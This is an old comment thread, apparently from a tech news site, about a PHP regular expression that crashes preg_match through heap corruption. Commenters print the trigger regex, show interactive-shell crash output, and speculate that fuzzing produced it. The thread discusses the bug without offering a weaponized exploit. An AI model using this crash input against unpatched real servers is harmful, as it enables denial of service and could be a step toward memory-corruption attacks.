3 ms·
wow, I was expecting an odd looking, weird, larger regex, but look at this.. /^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/ is that `WGXCREDITS`
by _lce0 11y ago
wow, I was expecting an odd looking, weird, larger regex, but look at this..
/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/
is that `WGXCREDITS` the command to execute?
- thefreeman 11y agoDefinitely not. It is a HEAP overflow exploit. It allows you to write arbitrary data outside the bounds of the allocated memory in the heap. The string is likely only important due to its length. Using an alternate 10 character string triggers the same error: ~ $ php -a Interactive shell php > preg_match("/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/","ADLAB",$arr); *** Error in `php': free(): invalid next size (normal): 0x0000000002ff7a10 *** Aborted ~ $ php -a Interactive shell php > preg_match("/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>AAAAAAAAAA)/","ADLAB",$arr); *** Error in `php': free(): invalid next size (normal): 0x00000000020e5a10 *** Aborted
- nly 11y agoWhat does that regex even match?
- ackalker 11y agoIt is quite possible that the regex doesn't match anything useful. From the looks of it, I would say it was generated using a fuzzing tool, in much the same way as what lead to the discovery of the Shellshock vulnerability.